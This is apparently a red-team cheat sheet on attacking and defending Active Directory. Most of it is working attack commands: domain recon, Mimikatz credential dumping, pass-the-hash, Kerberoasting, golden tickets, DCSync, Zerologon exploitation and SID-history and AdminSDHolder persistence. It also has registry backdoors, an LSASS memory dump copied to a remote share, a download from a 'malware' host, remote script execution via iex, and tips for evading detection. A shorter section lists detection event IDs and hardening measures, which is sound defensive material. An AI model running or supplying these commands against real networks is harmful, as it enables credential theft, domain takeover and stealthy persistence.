This document is designed to be a used in a red team assesment and contains commands, tools and methods with which anyone can attack and defend active directory.
- Tools
- Domain Recon
- Trust Enumeration
- User Recon
- Computer Recon
- Groups Recon
- Memership Recon
- Group Policy Recon
- OU Recon
- Special Target Recon
- Domain ACL Enumeration
- Exploitation
- PowerShell basics
- Enable PS Remoting
- Privilege Escalation - Local Admin
- Reigstry Backdoors
- Memory dump LOLBAS
- Download a Program
- Query Sessions
- View passwords in cleartext
- RDP without password
- Gain foothold
- ASEPRoast
- Unconstrained Delegation
- msDS-AllowedToDelegateTo
- Trusts
- Mimikatz
- Priv Escalation - AD
- HeidiSQL Portable
- Persistence
- ACE Format
- Protection
- Deception
- References - Wiki - DCShadow - BloodHound - CrackMapExec - EmPyre - Red Teaming AD (PDF) - Attack Methods - Domain Admin - Attacking Domain Trusts - Misc Tools/Scripts
- ADModule - Nikhil Mittal
- ADModule Microsoft Reference
- To audit GPO, use Grouper2
- PowerView
- PingCastle
- CrackMapExec
- AD Recon
- AD Explorer
- NetCease
- Impacket
- Evil-WinRM
- Mimikatz
- Rubeus
- Kerbrute
- Bloodhound
- [ADSI]
- System.DirectoryServices.ActiveDirectory
- Powershell AD Module
- PowerView
- When using PowerView beware of AVs / EDR you can use SharpView or modify it for own use.
- Bloodhound
- These days many environments have deception solutions / Microsoft ATA or similar software that detect bloodhoound data collection. Be careful when you use this.
- Gets you the domain name
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADClass::GetCurrentDomain()
- Gets you the domain information
- ADModule
Get-ADDomain
Get-ADDomain -Identity security.local
(Get-ADDomain).DomainSID
masscan --rate 100000 -e eth0 --ports<port range> --open-only <SCAN RANGE>
-
Common ports: 21, 22, 23, 25, 53, 80, 443, 445, 3389, etc
-
Nmap all "user$.domain_name" for open ports/services
-
Tuned Nmap
nmap -Pn -n -A -T4 --top-ports=1000 --max-rtt-timeouts=500ms --initial-rtt-timeout=200ms --min-rtt-timeout=2--ms --open --stats-every 5s <IP/Range>
- Gets you the domain policies related to kerberos
- PowerView
Get-DomainPolicy
(Get-DomainPolicy)."System Access"
(Get-DomainPolicy)."Kerberos Policy"
- Gets the Domain Controller you are connected to
- AD Module
Get-ADDomainController
- Powerview
Get-NetDomainTrust
Get-NetDomainTrust -Domain security.local
Get-NetForestTrust
- AD Module
Get-ADForest
Get-ADForest -Identity security.local
(Get-ADForest).Domains
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
- AD Module
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity domainAdmin -Properties *
Get-ADUser -Server DC.security.local
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberName *Properties | select name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
- Look at logoncount, badpwdcount, pwdlastset find real users and dodge fake and decoy users.
- AD Module
Get-ADUser -Filter 'If you have a filter' -Properties Description | select name,Description | Export-CSV "Description.csv"
- This will generate a 4662, which you can look for with the command
(Get-EventLog -LogName Security | Where-Object {$_.EventID -eq 4662} |
Select-Object -Property Category,Index,TimeGenerated,
EntryType,Source,InstanceID,Message) -match "domainAdminn" | Format-Table -AutoSize
- AD Module
Get-ADComputer -Filter * -Properties *
Get-ADComputer -Filter * | select name
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
- AD Module
Get-ADGroup -Filter * | select name
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
Get-ADGroupMember -Identity 'Administrators' -Recursive -Server <> | % {Get-ADUser $_ -prop ServicePrincipalName} | Where {$_.ServicePrincipalName}
- Key Admins and Enterprise Key Admins introduced from Windows Server 2016
- Look for IsGroup - Groupception i.e. where groups are a part of groups.
- Built-in admins renaming is useless as it will have 500 as SID ending. Use this technique if you can't find the built-in administratrator by name.
- Recursive gets the details of sub existing groups as well
- AD Module
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADPrincipalGroupMembership -Identity domainAdmin
- Powersploit
Get-NetGroupMember -GroupName '*Admin' -Domain security.local | Select-Object MemberName
- Filter based script
$Groups = Get-ADGroup -Filter * -SearchBase "OU=confidential,DC=security,DC=local"
$Members = foreach ($Group in $Groups)
{
Get-ADGroupMember -Identity $Group |
Where-Object objectClass -eq 'Group' |
Select-Object Name,SamAccountName
}
Write-Output $Members
- AD Module
Get-GPO -All
Get-GPResultatnSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html
- PowerView
Get-NetGPO | select dispalyname
Get-NetGPO -ComputerName <>
Get-NetGPOGroup
gpresult /R /V
Find-GPOComputerAdmin -Computername <>
Find-GPOLocation -UserName domainAdmin -Verbose
- PowerView
Get-NetOU -FullData
Get-NetOU -GPOname "{GUID}"
- AD Module
Get-ADOrganizatioalUnit -Filter * -Properties *
Get-GPO -Guid {GUID}
- PowerView
Get-NetLoggedon -ComputerName
Get-LoggedonLocal -ComputerName
Get-LastLoggedOn -ComputerName
- PowerView
Invoke-ShareFinder -Verbose
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
Invoke-FileFinder -Verbose
- PowerView
Get-NetFileServer
- PowerView
Find-LocalAdminAccess -Verbose
- PowerView
Find-WMILocalAdminAccess.ps1
Invoke-EnumerateLocalAdmin -Verbose
- PowerView
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -CheckAccess
Get-ObjectAcl -SamAccountName student1 -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=security,DC=local').Access
Get-ObjectAcl -ADSpath "LDAP://" -ResolveGUIs -Verbose
Invoke-ACLScanner -ResolveGUIDs
Get-PathAcl -Path "\\security.local\sysvol"
Get-SQLInstanceDomain
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLServerLink
start powershell -credential ""
Enter-PSSession -ComputerName COMPUTER -Credential USER
Invoke-Command -ComputerName <> -ScriptBlock ${function:hello}
ls function:
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName <>
Invoke-Mimikatz -DumpCreds -ComputerName
Exit-PSSession
- wsmprovhost is executed on a client computer when running PSRemoting
- PSExec
\PsExec.exe \\Computer -u domain\user -s powershell Enable-PSRemoting -Force
Invoke-WmiMethod -ComputerName <> -Namespace root\cimv2 -Class Win32_Process -Name Create -Credential "domain\user" -Impersonation 3 -EnableAllPrivileges -ArgumentList "powershell Start-Process powershell -Verb runAs -ArgumentList 'Enable-PSRemoting –force'"
- WMI
Invoke-WmiMethod -ComputerName localmachine.security.local -Namespace root\cimv2 -Class Win32_Process -Name Create -Credential "security.local\domainAdmin" -Impersonation 3 -EnableAllPrivileges -ArgumentList "powershell Start-Process powershell -Verb runAs -ArgumentList 'Enable-PSRemoting –force'"
- PowerSploit
Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
Get-ModifiableService -Verbose
- WMI
Get-WmiObject -Class win32_service | Where-Object {$_} | Where-Object {($_.pathname -ne $null) -and ($_.pathname.trim() -ne '')} | Where-Object { (-not $_.pathname.StartsWith("`"")) -and (-not $_.pathname.StartsWith("'"))} | Where-Object {($_.pathname.Substring(0, $_.pathname.ToLower().IndexOf(".exe") + 4)) -match ".* .*"}
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “cmd” /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
Rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\crash_dump.bin full
Copy-Item –Path C:\temp\crash_dump.bin –Destination '\\192.168.1.2\c$'
$url = "https://myhost.malware/file.exe"
$output = "./file.exe"
Invoke-WebRequest -Uri $url -OutFile $output
query session
logoff ID
- Powershell as Admin
New-ItemProperty "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name "UseLogonCredential" -Value 1 -PropertyType "DWord"
- cmd as admin
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
- Enable Restricted Admin to RDP without password
- Enable RestrictedAdmin to login with NTLM hash and mstsc.exe /RestrictedAdmin
- Use mimikatz to PTH / PTT and launch mstsc.exe /RestrictedAdmin after adding this key.
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
- Reset password of users who have PASSWD_NOTREQD flag set and have never set a password.
- BONUS: if they are part of a group which have extended rights. You can also use this account to persist, just make sure this account is ancient.
Get-ADUser -Filter "useraccountcontrol -band 32" -Properties PasswordLastSet | Where-Object { $_.PasswordLastSet -eq $null } | select SamAccountName,Name,distinguishedname | Out-GridView
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Add-Type -AssemblyName System.IndemtityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
Invoke-Mimikatz -Command '"kerberos::list /export"
python tgsrepcrack.py wordlist.txt .kirbi
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose
Get-ASREPHash -UserName -Verbose
Invoke-ASREPRoast -Verbose
Get-NetComputer -UnConstrained
Get-NetUser -UnConstrained
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq True}
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
lsadump::trust /patch
kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
.\asktgs.exe c:\temp\ticket.kirbi CIFS/DC.parent.local
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
dir \\machine.domain.local\c$
privilege::debug
!+
token::elevate
!processprotect /remove /process:LSASS.EXE
misc::memssp
- Dump passwords
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords full"
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::wdigest"
- MiniDump
privilege::debug
sekurlsa::minidump crash_dump.bin
sekurlsa::logonPasswords
- Pass the Hash
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::pth /user:Administrateur /domain:security.local /ntlm:xxxxxxxxxxxxx"
- Export Tickets
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::tickets /export"
- List Kerberos encryption keys
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::ekeys"
- Credential Manager & DPAPI
dir \\192.168.1.2\c$\Users\<username>\AppData\Local\Microsoft\Credentials\*
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\164451c5ed8ad780d136e400bd0c50c8
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::dpapi"
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\164451c5ed8ad780d136e400bd0c50c8 /masterkey:e605b19f96917ed2a29c816eb2f2cfdb85c9ba67379e62721b77b3ee0e23ec6e253ba6202a1595dc63083212d8933a11bc93fc85c5bac7f04406d5d5af2e57a3
- Vault
vault::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Vault\"
- List Kerberos credentials for all authenticated users (including services and computer account)
Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::kerberos"
- Dump all local credentials on a Windows computer
Invoke-Mimikatz -Command "token::elevate" "lsadump::sam"
- DCSync - Golden Ticket
mimikatz "lsadump::dcsync /domain:security.local /user:netbios\krbtgt"
.\mimikatz.exe kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
- Zerologon
lsadump::zerologon /server:DC.security.local /account:DC$
lsadump::zerologon /server:DC.security.local /account:DC$ /exploit
lsadump::dcsync /domain:security.local /dc:DC /user:krbtgt /authuser:DC$ /authdomain:security /authpassword:"" /authntlm
Rubues.exe monitor /interval:1 > tickets.txt
SpoolSample.exe target client
select * from openquery("dcorp-sql1",'select * from masters..sysservers ')
Get-SQLServerLinkCrawl -Instance <> -Verbose
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;')AT("eu-sql")
Get-SQLServerLinkCrawl -Instance <> -Query "exec master ..xp_cmdshell 'whoami'"
- Provide the new ID with ACLs to DCSync.
- Give yourself or the victim Replicate DC, Replicate All, Replicate In Filtered Set to DCSync.
Set-ADACL -DistinguishedName 'DC=SRV,DC=security,DC=local' -Principal domainAdmin -GUIDRight DCSync -Verbose
mimikatz "lsadump::dcsync /domain:security.local /user:netbios\krbtgt"
- krbtgt requires 2 reset to mitigate golden ticket
- Evade time based detection with renewmax
- Bypass the MaxTicketAge when creating a golden ticket and check for detection
kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
kerberos::golden /user:Administrator /domain:security.local /sid:S-1-5-21-123456789-1234567890-1111112345 /aes128:xxxxx id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
- Add WMI Rights on a DC as persistence and execute code wheneever you want.
- Add you account to dcomcnfg WMI -> Component Services (COM Security) and Comp Management (WMI Control - root namespace)
- This privilege will not add the ID in the Domain Admin group, however allows the ID to modify the Domain Admins group.
- ADModule
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=SRV,DC=security,DC=local' -Principal domainAdmin -Verbose
Add-ADGroupMember -Identity 'Domain Admins' -Members testda -Verbose
Add-ObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=security,DC=local' -PrincipalIdentity hacker -Verbose -Rights All
Get-ObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=security,DC=local' -Verbose
- Invoke-ADSDPropagation
powershell.exe iex (iwr 'https://raw.githubusercontent.com/edemilliere/ADSI/master/Invoke-ADSDPropagation.ps1')
Invoke-ADSDPropagation
- Modify the SIDHistory attribute of an ID to the SID of a privileged user.
- Allows the user to have high privileges without being a member of that group.
- Nice technique, however it is getting detected easily now.
- Check if domain / trust have SID Filtering enabled beforehand.
privilege::debug
token::elevate
sid::patch
sid::add /sam:"hacker" /new:S-1-5-21-123456789-1234567890-1111112345-519
- Use mimikatz to dump the DSRM Admin password.
- This hash is never changed by SysAdmins as this is a recovery account.
privilege::debug
lsadump::sam
- Copy the NTLM Hash
Domain : SECURITY
SysKey : 48e9dfa91da8e1b32a38b9e45323e430
Local SID : S-1-5-21-123456789-1234567890-1111112345
SAMKey : 2c9d7841c1ab3a64b7e0f8d5ee3ad828
RID : 000001f4 (500)
User : Administrator
Hash NTLM: af5adaaf26ccc3fab908fcb5435b49d8
- PowerShell
New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD
- cmd
REG ADD HKLM\System\CurrentControlSet\Control\Lsa\ /v DsrmAdminLogonBehavior /t REG_DWORD /d 1 /f
- ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
- RACEToolkit
-
Limit DAs login, if DA login is necessary donot allow other administrators to login to that machine.
-
Never run service with a DA priv Add-ADGroupMember -Identity 'Domain Admins' -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)
- 4624: Account Logon
- 4634: Account Logoff
- 4672: Admin Logon
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *
- 4624: Account Logon
- 4634: Account Logoff
- No 4672 due to Silver Ticket
- System 7045 - A service was installed in the system
- 4673 - Sensitive Privilege Use
- 4611 - logon process reg with LSA
New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose
- 4657 - Audit creation/change of DSRMAdminLogonBehavior
- 4769 : kerberos ticket was requested
- Managed Service Accounts - Automatic change of password perodically
- Service name should not be krbtgt
- Service name should end with $
- account name should not be machine@domain
- Failure code is '0x0'
- Encryption type should be 0x17
- Account is sensitive and cannot be delegated for privileged accounts
-
4662 - An operation was performed on an object
-
5136 - A directory service object was modified
-
4670 - Permissions on object were changed
-
4780 - The ACL was set on accounts which are members of administrators groups
-
4756 - Account was added to security-enabled universal group
- Enable SIDFiltering
- Selective Authentication
-
4776
-
Builds profile over time
-
UEBA in 4 weeks for org
-
Lightweight gateway on DCs
-
Ignore Get-NetGroupMember and Get-NetComputer
-
Use AES256 and AES128 to bypass Over Pass The Hash Detection and Golden Ticket Detection
-
Envrypted PA-DATA PA-ENC-TIMESTAMP
-
Create Ticket for non-existent user
-
DCSync is not spoofable until ST is used
-
DCShadow is not detected, which allows DCSync
- ms-mcs-AdmPwd
- ms-mcs-AdmPwdExpirationTime
- AdmPwd.dll
- Which users are allowed to view these LAPS
- Blocks PTH and over PTH
- SAM and LSA Secrets are not protected
- Cannot be enabled over a domain controller as it breaks authentication over there
- Cannot use CredSSP and WDigest - clear text caching stop
- NTLM is not cached
- Kerberos doesnot use DES or RC4 keys
- If domain functional level is Sever 2012 R2
- No NTLM Auth
- No DES or RC4 keys
- No delegation
- No renewal of TGT
- MS to add DAs and EAs to this group without testing the impact of "lockout"
- Deploy PAWs like solution if possible
- WMI Filtering
- Change machine policy for GPO to 'Domain Computers' and remove read for 'Authenticated Users' in GPO settings
- Add specific computers to GPO in filtering
- Attacker tip: write directly to SYSVOL to avoid GPO audit
- MS Pass the hash whitepaper
- Tier 0 - Accounts, Groups and computers such as dc, da and ea
- Tier 1 - Accounts, Groups and computers such as local admin on multiple servers with business value
- Tier 2 - Administrative accounts such as help desk, support admin
- Administrative Forest called Red Forest
- Selective Authentication in Red Forest
- 4104 Suspicious (Script Block Logging)
- Module is highest, System wide Script is high
- PSAmsi-Mimimizing-Obfuscation-To-Maximize-Stealth
- Password does not expire
- Trusted for Delegation
- Users with SPN
- Password in description
- High Privileged Users
- ACL rights over other users, groups or containers
- GenericRead for "Everyone"
- 4662 log - An operation was performed on an object
- x500uniqueIdentifier
- Older Operating Systems
- DCShadow for Deception - chances of auth failure
- Forest Admins
- Set Logon Workstation to a non-existent machine
- Deny logon to user
- 4768 Kerberos use
- Master user and Slave user
- Rights to GA - Slave user
- objectSID
- lastLogon, lastlogotimestamp
- Logoncount
- whenCreated
- Badpwdcount
- Honeypot buster tracks 6 logons
-
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html?m=1
-
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
-
If SMB signing is disabled
-
Spoof
-
auxiliary/spoof/llmnr/llmnr_response
-
auxiliary/spoof/nbns/nbns_response
-
-
Capture
-
auxiliary/server/capture/smb
-
auxiliary/server/capture/http_ntlm
-
set JOHNPWFILE /tmp/smbhashes.john
-
-
Reference
- GP3Finder - https://bitbucket.org/grimhacker/gpppfinder
gp3finder -A -t DOMAIN\_CONTROLLER -u DOMAINUSER\
-
Locate SYSVOL
-
\\domain_controller\SYSVOL\DOMAIN_NAME\Policies
-
Metasploit GPP Module
-
Decrypt GPP Password
- PowerSploit - Get-GPPPassword
-
gpresult \[/x\], \[/h\] <FILENAME>
-
Helpful - https://www.gracefulsecurity.com/privilege-escalation-in-windows-domains/
-
Powershell & C# - https://decoder.cloud/2018/02/02/getting-system/
-
Mimikatz - https://www.gracefulsecurity.com/privesc-dumping-passwords-in-plaintext-mimikatz/
-
Incognito - https://www.gracefulsecurity.com/privesc-stealing-windows-access-tokens-incognito/